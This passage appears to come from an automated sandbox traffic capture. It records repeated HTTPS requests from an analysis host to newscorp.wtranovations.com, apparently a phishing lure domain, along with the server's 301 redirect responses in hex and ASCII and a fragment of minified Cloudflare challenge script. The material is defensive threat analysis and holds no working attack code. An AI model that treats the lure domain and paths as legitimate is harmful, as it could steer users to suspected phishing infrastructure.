                                                                                                                                                                                                                      Data Ascii: nfigurable:!0}}),ee(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,ar
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b
                                                                                                                                                                                                                      Data Ascii: tion(e,t,a){var o=Tt(t.params,!1),c="h/".concat("b","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(a);


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      16192.168.11.1249392104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1182INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:06 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq1QTLUgkZDSEXfkAI91SLoN2klkMbZy5lkSmP6lKvbNMhxu8FwnWNMHXYK9PZmtht820mkLdDy9%2FFnrC3teG8nJHtESalDIseZSpIhJBQLYG7kRbi9TV9PrPAth3EatLclFGgqfP7y3DvFR4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=72&min_rtt=72&rtt_var=36&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23badc174c2d-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128877&min_rtt=128835&rtt_var=27248&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=991&delivery_rate=31291&cwnd=252&unsent_bytes=0&cid=7b44f6c84d245714&ts=356&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      17192.168.11.1249393104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:06 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 0
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23bd9a3c495c-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129128&min_rtt=128968&rtt_var=27449&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=948&delivery_rate=31187&cwnd=252&unsent_bytes=0&cid=1e9a35a251d46fbd&ts=321&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      18192.168.11.1249394104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC1199INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:07 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:07 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwBmGZetV%2F8gOZM0io4R2O7uxlKyV98g24boz6KUDP4nPz2cH66vnWNp35ChGU5Wuq9ls1ihfHjfneCOaItXI8LGrL8eMJjjtXUxMHdUo1hk%2FP1%2BHwnt15kAthfBUHtPgLtEDJ2UNJNqnE3fmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=53&rtt_var=20&sent=2&recv=5&lost=0&retrans=0&sent_bytes=1231&recv_bytes=1301&delivery_rate=1190600000&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23bedc9eda33-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134153&min_rtt=134140&rtt_var=28318&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=30090&cwnd=252&unsent_bytes=0&cid=6dcd0374d2385faf&ts=340&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC170INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC3INData Raw: 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      19192.168.11.1249395104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC1177INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:07 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:05 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpjFV%2FLeaQ1K0m7Qv07R0g6HUryXUSGgO7Z2Lwcsqu1cCZc7sTA5rQuPGBDzLwIL4x1%2Bnvoi3KAggY1eRm4KALkMH%2BNjgw1CPQ2qsj5cK4dvhRp0hUM6bQkcDHjOVO4JaEassKiDVP2mZrr0aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=565&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23c0fa94bd12-ATL
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=114103&min_rtt=113987&rtt_var=24221&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=35310&cwnd=252&unsent_bytes=0&cid=6dc6c436bda63710&ts=295&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      20192.168.11.1249396104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC1201INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:07 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:07 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bAu6qtJlT7QKAv6m6G8pYylHXHHWFFjgED5cLlqu4E3Ds319msGlPV08SgABag73Se7NpSGdHIHMVbT0S45%2BQWROF2I4NfzQEThdX%2FpEIL6k9mWRM205P8zTuCRGBXY24%2BavGPnV%2F82lbIZcdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=72&min_rtt=62&rtt_var=30&sent=2&recv=5&lost=0&retrans=0&sent_bytes=1231&recv_bytes=1277&delivery_rate=1056177419&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23c2ae1d31ec-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129038&min_rtt=128922&rtt_var=27369&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=991&delivery_rate=31235&cwnd=252&unsent_bytes=0&cid=383cda0b33219e33&ts=339&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC168INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC5INData Raw: 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: >
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      21192.168.11.1249397104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:07 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC958INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:07 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Cf-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      CF-RAY: 923e23c4bb1c09d2-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC178INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      22192.168.11.1249398104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC1194INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:08 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:08 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqTcb%2FPnyCMa0vru3o0ZE93pHTmqsiMbE7Uo8CQhxKavYKp3lSpuP05FAvQgtG%2B4RYSV4FC1AVtU8Kuca20pg7DQ9o4su%2FybdR%2FN%2BmZgzKBDF8RGhUMukahOW%2Fot5Jc6OfxZ73MIinc%2F9f8uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=58&min_rtt=58&rtt_var=29&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23c6895b9acb-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134317&min_rtt=134266&rtt_var=28401&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=30036&cwnd=252&unsent_bytes=0&cid=3923d7ac4b974338&ts=352&x=0"
